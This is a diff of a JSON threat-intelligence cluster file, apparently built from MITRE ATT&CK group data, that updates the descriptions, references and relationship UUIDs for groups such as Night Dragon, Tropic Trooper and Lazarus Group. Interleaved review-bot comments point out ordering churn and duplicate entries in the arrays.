+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "ebbe170d-aa74-4946-8511-9921243415a3",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
 {
 "dest-uuid": "aafea02e-ece5-4bb2-91a6-3bf8c7f38a39",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
+ },
+ {
+ "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
 }
 ],
 "uuid": "dc6fe6ee-04c2-49be-ba3d-f38d2463c02a",
@@ -1503,8 +1541,8 @@ "refs": [ "https://attack.mitre.org/groups/G0009", "https://blog.crowdstrike.com/deep-thought-chinese-targeting-national-security-think-tanks/", - "https://www.emc.com/collateral/white-papers/h12756-wp-shell-crew.pdf", "https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/", + "https://www.emc.com/collateral/white-papers/h12756-wp-shell-crew.pdf", "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-black-vine-cyberespionage-group.pdf", "https://icitech.org/icit-brief-chinas-espionage-dynasty-economic-death-by-a-thousand-cuts/" ], @@ -1547,21 +1585,7 @@ "type": "uses" }, { - "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "00d0b012-8a03-410e-95de-5826bf542de6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "2e45723a-31da-4a7e-aaa6-e01998a6788f", + "dest-uuid": "68f7e3a1-f09f-4164-9a62-16b648a0dd5a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1575,14 +1599,7 @@ "type": "uses" }, { - "dest-uuid": "c16e5409-ee53-4d79-afdc-4099dc9292df", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "68f7e3a1-f09f-4164-9a62-16b648a0dd5a", + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
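Review bot: The hunks from `@@ -1547,21 +1585,7 @@` onward in this section delete and re-insert the same `dest-uuid` values (for example `68f7e3a1-…`, `01a5a209-…`, `00d0b012-…`, `2e45723a-…`), so most of the diff is ordering churn rather than a change in relationships; the same pattern recurs in the later `@@ -1689`, `@@ -2286`, `@@ -2418` and `@@ -2541` hunks. The order appears to follow whatever sequence the upstream data is iterated in, which is evidently not stable between refreshes. Sorting each `related` array by `dest-uuid` in whatever generates this file would make genuine additions and removals stand out — for instance `1a295f87-…`, which the `@@ -1772,7 +1927,7 @@` hunk replaces with `7dd95ff6-…` and which does not reappear in the visible part of that section. The enclosing `related` array starts before the hunk.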
@@ -1596,21 +1613,7 @@ "type": "uses" }, { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "94379dec-5c87-49db-b36e-66abc0b81344", + "dest-uuid": "00d0b012-8a03-410e-95de-5826bf542de6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1624,14 +1627,14 @@ "type": "uses" }, { - "dest-uuid": "9b99b83a-1aac-4e29-b975-b374950551a3", + "dest-uuid": "2e45723a-31da-4a7e-aaa6-e01998a6788f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "fbb470da-1d44-4f29-bbb3-9efbe20f94a3", + "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1657,6 +1660,41 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9b99b83a-1aac-4e29-b975-b374950551a3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "fbb470da-1d44-4f29-bbb3-9efbe20f94a3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "94379dec-5c87-49db-b36e-66abc0b81344", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c16e5409-ee53-4d79-afdc-4099dc9292df", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "a653431d-6a5e-4600-8ad3-609b5af57064", 
@@ -1689,6 +1727,13 @@ ], "type": "uses" }, + { + "dest-uuid": "66b1dcde-17a0-4c7b-95fa-b08d430c2131", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ @@ -1697,7 +1742,7 @@ "type": "uses" }, { - "dest-uuid": "66b1dcde-17a0-4c7b-95fa-b08d430c2131", + "dest-uuid": "0db09158-6e48-4e7c-8ce7-2b10b9c0c039", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1717,13 +1762,6 @@ ], "type": "uses" }, - { - "dest-uuid": "0db09158-6e48-4e7c-8ce7-2b10b9c0c039", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "e1161124-f22e-487f-9d5f-ed8efc8dcd61", "tags": [ @@ -1736,17 +1774,15 @@ "value": "Dust Storm - G0031" }, { - "description": "[Night Dragon](https://attack.mitre.org/groups/G0014) is a campaign name for activity involving threat group that has conducted activity originating primarily in China. (Citation: McAfee Night Dragon) The activity from this group is also known as Musical Chairs. (Citation: Arbor Musical Chairs Feb 2018)", + "description": "[Night Dragon](https://attack.mitre.org/groups/G0014) is a campaign name for activity involving a threat group that has conducted activity originating primarily in China. (Citation: McAfee Night Dragon)", "meta": { "external_id": "G0014", "refs": [ "https://attack.mitre.org/groups/G0014", - "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf", - "https://www.arbornetworks.com/blog/asert/musical-chairs-playing-tetris/" + "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf" ], "synonyms": [ - "Night Dragon", - "Musical Chairs" + "Night Dragon" ] }, "related": [ 
@@ -1764,6 +1800,125 @@ ], "type": "uses" }, + { + "dest-uuid": "b07c2c47-fefb-4d7c-a69e-6a3296171f54", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "54e8672d-5338-4ad1-954a-a7c986bee530", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56f46b17-8cfa-46c0-b501-dd52fef394e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0c8465c0-d0b4-4670-992e-4eee8d7ff952", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + 
"type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c23b740b-a42b-47a1-aec2-9d48ddd547ff", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", "tags": [ @@ -1772,7 +1927,7 @@ "type": "uses" }, { - "dest-uuid": "1a295f87-af63-4d94-b130-039d6221fb11", + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1785,6 +1940,13 @@ ], "type": "uses" }, + { + "dest-uuid": "488da8ed-2887-4ef6-a39a-5b69bc6682c6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "9755ecdc-deb0-40e6-af49-713cb0f8ed92", "tags": [ 
@@ -1797,16 +1959,135 @@ "value": "Night Dragon - G0014" }, { - "description": "[Lazarus Group](https://attack.mitre.org/groups/G0032) is a threat group that has been attributed to the North Korean government. (Citation: US-CERT HIDDEN COBRA June 2017) The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta. Malware used by [Lazarus Group](https://attack.mitre.org/groups/G0032) correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain. (Citation: Novetta Blockbuster) In late 2017, [Lazarus Group](https://attack.mitre.org/groups/G0032) used KillDisk, a disk-wiping tool, in an attack against an online casino based in Central America. (Citation: Lazarus KillDisk)", + "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) is an unaffiliated threat group that has led targeted campaigns against targets in Taiwan, the Philippines, and Hong Kong. 
[Tropic Trooper](https://attack.mitre.org/groups/G0081) focuses on targeting government, healthcare, transportation, and high-tech industries and has been active since 2011.(Citation: TrendMicro Tropic Trooper Mar 2018)(Citation: Unit 42 Tropic Trooper Nov 2016)", + "meta": { + "external_id": "G0081", + "refs": [ + "https://attack.mitre.org/groups/G0081", + "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/", + "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" + ], + "synonyms": [ + "Tropic Trooper", + "KeyBoy" + ] + }, + "related": [ + { + "dest-uuid": "dc27c2ec-c5f9-4228-ba57-d67b590bda93", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b42378e0-f147-496f-992a-26a49705395b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "514ede4c-78b3-4d78-a38b-daddf6217a79", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + 
"dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "dc31fe1e-d722-49da-8f5f-92c7b5aff534", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "56319646-eb6e-41fc-ae53-aadfa7adb924", + "value": "Tropic Trooper - G0081" + }, + { + "description": "[Lazarus Group](https://attack.mitre.org/groups/G0032) is a threat group that has been attributed to the North Korean government.(Citation: US-CERT HIDDEN COBRA June 2017) The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta. Malware used by [Lazarus Group](https://attack.mitre.org/groups/G0032) correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain. (Citation: Novetta Blockbuster) In late 2017, [Lazarus Group](https://attack.mitre.org/groups/G0032) used KillDisk, a disk-wiping tool, in an attack against an online casino based in Central America. 
(Citation: Lazarus KillDisk)\n\nNorth Korean group definitions are known to have significant overlap, and the name [Lazarus Group](https://attack.mitre.org/groups/G0032) is known to encompass a broad range of activity. Some organizations use the name Lazarus Group to refer to any activity attributed to North Korea.(Citation: US-CERT HIDDEN COBRA June 2017) Some organizations track North Korean clusters or groups such as Bluenoroff,(Citation: Kaspersky Lazarus Under The Hood Blog 2017) [APT37](https://attack.mitre.org/groups/G0067), and [APT38](https://attack.mitre.org/groups/G0082) separately, while other organizations may track some activity associated with those group names by the name Lazarus Group.", "meta": { "external_id": "G0032", "refs": [ "https://attack.mitre.org/groups/G0032", - "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", "https://www.us-cert.gov/ncas/alerts/TA17-164A", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/", + "https://securelist.com/lazarus-under-the-hood/77908/", + "https://www.us-cert.gov/ncas/analysis-reports/AR19-100A", "https://blogs.microsoft.com/on-the-issues/2017/12/19/microsoft-facebook-disrupt-zinc-malware-attack-protect-customers-internet-ongoing-cyberthreats/", - "https://www.secureworks.com/about/press/media-alert-secureworks-discovers-north-korean-cyber-threat-group-lazarus-spearphishing", - "https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/" + "https://www.secureworks.com/about/press/media-alert-secureworks-discovers-north-korean-cyber-threat-group-lazarus-spearphishing" ], "synonyms": [ "Lazarus Group", 
@@ -1839,70 +2120,7 @@ "type": "uses" }, { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "dc27c2ec-c5f9-4228-ba57-d67b590bda93", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -1915,20 +2133,6 @@ ], "type": "uses" }, - { - "dest-uuid": "bd0536d7-b081-43ae-a773-cfb057c5b988", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ 
@@ -1936,139 +2140,6 @@ ], "type": "uses" }, - { - "dest-uuid": "4ae4f953-fe58-4cc8-a327-33257e30a830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "99709758-2b96-48f2-a68a-ad7fbd828091", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "02fefddc-fb1b-423f-a76b-7552dd211d4d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "d21a2069-23d5-4043-ad6d-64f6b644cb1a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1f6e3702-7ca1-4582-b2e7-4591297d05a8", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7ba0fc46-197d-466d-8b9f-f1c64d5d81e5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - 
"type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", "tags": [ 
@@ -2077,63 +2148,56 @@ "type": "uses" }, { - "dest-uuid": "495b6cdb-7b5a-4fbc-8d33-e7ef68806d08", + "dest-uuid": "dc27c2ec-c5f9-4228-ba57-d67b590bda93", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "dest-uuid": "d21a2069-23d5-4043-ad6d-64f6b644cb1a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "dest-uuid": "02fefddc-fb1b-423f-a76b-7552dd211d4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", + "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
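Review bot: The new side of this `related` array carries the same `dest-uuid` more than once: `9422fc14-…` is added here and again in the `@@ -2307,7 +2651,7 @@` hunk, `43e7dc91-…` here and again in the `@@ -2321,14 +2665,14 @@` hunk, and `b3d682b6-…` in the `@@ -2146,6 +2210,118 @@` hunk and again in that `@@ -2321` hunk. The line numbering suggests all of these hunks belong to the single array closed by `"uuid": "c5574ca0-d5a4-490a-b207-e4658e5fd1d7"`, though the context between hunks is not visible. The duplication predates this commit — the removed lines in `@@ -1936,139 +2140,6 @@` and the old context around `@@ -2286` carry the same ids — so the generator presumably emits one entry per upstream relationship object rather than per unique target; deduplicating on the (`dest-uuid`, `type`) pair before writing the array would stop consumers that build graphs from it double-counting edges. The start of this array is outside the hunk.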
@@ -2146,6 +2210,118 @@ ], "type": "uses" }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "11e36d5b-6a92-4bf9-8eb7-85eb24f59e22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "495b6cdb-7b5a-4fbc-8d33-e7ef68806d08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + 
"type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "5a63f900-5e7e-4928-a746-dd4558e1df71", "tags": [ @@ -2153,6 +2329,48 @@ ], "type": "uses" }, + { + "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4ae4f953-fe58-4cc8-a327-33257e30a830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", + "tags": [ + 